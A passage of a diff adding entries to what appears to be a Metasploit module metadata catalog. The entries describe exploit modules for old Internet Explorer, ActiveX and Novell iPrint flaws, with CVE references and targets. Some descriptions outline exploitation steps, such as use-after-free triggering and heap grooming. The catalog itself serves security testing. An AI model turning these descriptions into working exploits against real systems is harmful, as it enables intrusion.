Precise control of\n the freed object allows arbitrary code execution under the context of the user.", + "references": [ + "CVE-2013-3205", + "OSVDB-97094", + "MSB-MS13-069", + "ZDI-13-217" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_069_caret.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_069_caret", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_080_cdisplaypointer": { + "name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", + "fullname": "exploit/windows/browser/ms13_080_cdisplaypointer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". 
The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.", + "references": [ + "CVE-2013-3897", + "OSVDB-98207", + "MSB-MS13-080", + "URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx", + "URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_080_cdisplaypointer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_090_cardspacesigninhelper": { + "name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow", + "fullname": "exploit/windows/browser/ms13_090_cardspacesigninhelper", + "aliases": [], + "rank": 300, + "disclosure_date": 
"2013-11-08", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.", + "references": [ + "CVE-2013-3918", + "OSVDB-99555", + "BID-63631", + "MSB-MS13-090", + "URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP with IE 8" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_090_cardspacesigninhelper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_012_cmarkup_uaf": { + 
"name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", + "fullname": "exploit/windows/browser/ms14_012_cmarkup_uaf", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-13", + "type": "exploit", + "author": [ + "Unknown", + "Jean-Jamil Khalife", + "juan vazquez " + ], + "description": "This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.", + "references": [ + "CVE-2014-0322", + "MSB-MS14-012", + "BID-65551", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html", + "URL-http://hdwsec.fr/blog/CVE-2014-0322.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / IE 10 / FP 12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_012_cmarkup_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_012_textrange": { + "name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free", + "fullname": "exploit/windows/browser/ms14_012_textrange", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-11", + "type": "exploit", + "author": [ + "Jason Kratzer", + "sinn3r " + ], + "description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. 
In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.", + "references": [ + "CVE-2014-0307", + "MSB-MS14-012" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms14_012_textrange.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_012_textrange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_064_ole_code_execution": { + "name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", + "fullname": "exploit/windows/browser/ms14_064_ole_code_execution", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-11-13", + "type": "exploit", + "author": [ + "Robert Freeman", + "yuange", + "Rik van Duijn", + "Wesley Neelen", + "GradiusX ", + "b33f", + "sinn3r " + ], + "description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 until version 11 within\n Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 box due to the Powershell limitation.\n\n Windows XP by defaults supports VBS, therefore it is used as the attack vector. 
On other\n newer Windows systems, the exploit will try using Powershell instead.", + "references": [ + "CVE-2014-6332", + "MSB-MS14-064", + "OSVDB-114533", + "EDB-35229", + "EDB-35308", + "URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows", + "URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP", + "Windows 7" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_064_ole_code_execution", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms16_051_vbscript": { + "name": "Internet Explorer 11 VBScript Engine Memory Corruption", + "fullname": "exploit/windows/browser/ms16_051_vbscript", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-05-10", + "type": "exploit", + "author": [ + "Theori", + "William Webb " + ], + "description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.", + "references": [ + "CVE-2016-0189", + "MSB-MS16-051" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 10 with IE 11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms16_051_vbscript", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/msvidctl_mpeg2": { + "name": "Microsoft 
DirectShow (msvidctl.dll) MPEG-2 Memory Corruption", + "fullname": "exploit/windows/browser/msvidctl_mpeg2", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-05", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid", + "references": [ + "CVE-2008-0015", + "OSVDB-55651", + "BID-35558", + "MSB-MS09-032", + "MSB-MS09-037" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb", + "is_install_path": true, + "ref_name": "windows/browser/msvidctl_mpeg2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mswhale_checkforupdates": { + "name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/mswhale_checkforupdates", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-04-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. 
When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-2238", + "OSVDB-53933", + "URL-http://technet.microsoft.com/en-us/library/dd282918.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb", + "is_install_path": true, + "ref_name": "windows/browser/mswhale_checkforupdates", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/msxml_get_definition_code_exec": { + "name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", + "fullname": "exploit/windows/browser/msxml_get_definition_code_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "inking26", + "binjo", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.", + "references": [ + "CVE-2012-1889", + "BID-53934", + "OSVDB-82873", + "MSB-MS12-043", + "URL-http://technet.microsoft.com/en-us/security/advisory/2719615", + "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462", + "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows 
XP SP3 / Vista SP2", + "IE 8 on Windows XP SP3", + "IE 8 with Java 6 on Windows XP SP3", + "IE 8 with Java 6 on Windows 7 SP1/Vista SP2", + "IE 9 with Java 6 on Windows 7 SP1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/msxml_get_definition_code_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nctaudiofile2_setformatlikesample": { + "name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow", + "fullname": "exploit/windows/browser/nctaudiofile2_setformatlikesample", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-01-24", + "type": "exploit", + "author": [ + "MC ", + "dookie", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. 
By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2007-0018", + "OSVDB-32032", + "BID-22196", + "US-CERT-VU-292713" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 Pro English (IE6)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb", + "is_install_path": true, + "ref_name": "windows/browser/nctaudiofile2_setformatlikesample", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nis2004_antispam": { + "name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/nis2004_antispam", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-03-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. 
When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2004-0363", + "OSVDB-6249", + "BID-9916" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nis2004_antispam.rb", + "is_install_path": true, + "ref_name": "windows/browser/nis2004_antispam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nis2004_get": { + "name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/nis2004_get", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2007-1689", + "OSVDB-36164", + "URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nis2004_get.rb", + "is_install_path": true, + "ref_name": "windows/browser/nis2004_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, 
+ "exploit_windows/browser/notes_handler_cmdinject": { + "name": "IBM Lotus Notes Client URL Handler Command Injection", + "fullname": "exploit/windows/browser/notes_handler_cmdinject", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "Moritz Jodeit", + "Sean de Regge", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.", + "references": [ + "CVE-2012-2174", + "OSVDB-83063", + "BID-54070", + "ZDI-12-154", + "URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html", + "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb", + "is_install_path": true, + "ref_name": "windows/browser/notes_handler_cmdinject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/novell_groupwise_gwcls1_actvx": { + "name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/novell_groupwise_gwcls1_actvx", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-30", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. 
Several methods in the GWCalServer control use user provided data as\n a pointer, which allows to read arbitrary memory and execute arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.", + "references": [ + "CVE-2012-0439", + "OSVDB-89700", + "BID-57658", + "ZDI-13-008", + "URL-http://www.novell.com/support/kb/doc.php?id=7011688" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb", + "is_install_path": true, + "ref_name": "windows/browser/novell_groupwise_gwcls1_actvx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_callbackurl": { + "name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_callbackurl", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-20", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2010-1527", + "OSVDB-67411", + "URL-http://web.archive.org/web/20100824204359/http://secunia.com:80/secunia_research/2010-104", + "EDB-15042" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + 
"autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_callbackurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_datetime": { + "name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_datetime", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", + "references": [ + "CVE-2009-1569", + "BID-37242", + "OSVDB-60804", + "URL-http://web.archive.org/web/20091213033620/http://secunia.com:80/advisories/35004" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iPrint 5.30 Windows Client" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_datetime.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_datetime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_executerequest": { + "name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_executerequest", + "aliases": [], + "rank": 
300, + "disclosure_date": "2008-02-22", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-0935", + "OSVDB-42063", + "BID-27939" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_executerequest", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_executerequest_dbg": { + "name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_executerequest_dbg", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-04", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-3106", + "OSVDB-66960", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06", + "EDB-15001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb", + 
"is_install_path": true, + "ref_name": "windows/browser/novelliprint_executerequest_dbg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_getdriversettings": { + "name": "Novell iPrint Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_getdriversettings", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-2908", + "OSVDB-46194", + "URL-http://web.archive.org/web/20081206030916/http://secunia.com:80/advisories/30709/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_getdriversettings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_getdriversettings_2": { + "name": "Novell iPrint Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_getdriversettings_2", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-11-15", + "type": "exploit", + "author": [ + "mr_me ", + "Dr_IDE" + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. 
When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4321", + "BID-44966", + "OSVDB-69357", + "ZDI-10-256", + "EDB-16014", + "URL-http://www.novell.com/support/viewContent.do?externalId=7007234" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_getdriversettings_2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_target_frame": { + "name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_target_frame", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. 
When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", + "references": [ + "CVE-2009-1568", + "BID-37242", + "OSVDB-60803", + "URL-http://web.archive.org/web/20091213033630/http://secunia.com:80/advisories/37169" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iPrint 5.30 Windows Client" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_target_frame", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ntr_activex_check_bof": { + "name": "NTR ActiveX Control Check() Method Buffer Overflow", + "fullname": "exploit/windows/browser/ntr_activex_check_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-11", + "type": "exploit", + "author": [ + "Carsten Eiram", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. 
In order to bypass\n DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.", + "references": [ + "CVE-2012-0266", + "OSVDB-78252", + "BID-51374", + "URL-http://web.archive.org/web/20120514113631/http://secunia.com/secunia_research/2012-1/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/ntr_activex_check_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ntr_activex_stopmodule": { + "name": "NTR ActiveX Control StopModule() Remote Code Execution", + "fullname": "exploit/windows/browser/ntr_activex_stopmodule", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-11", + "type": "exploit", + "author": [ + "Carsten Eiram", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. 
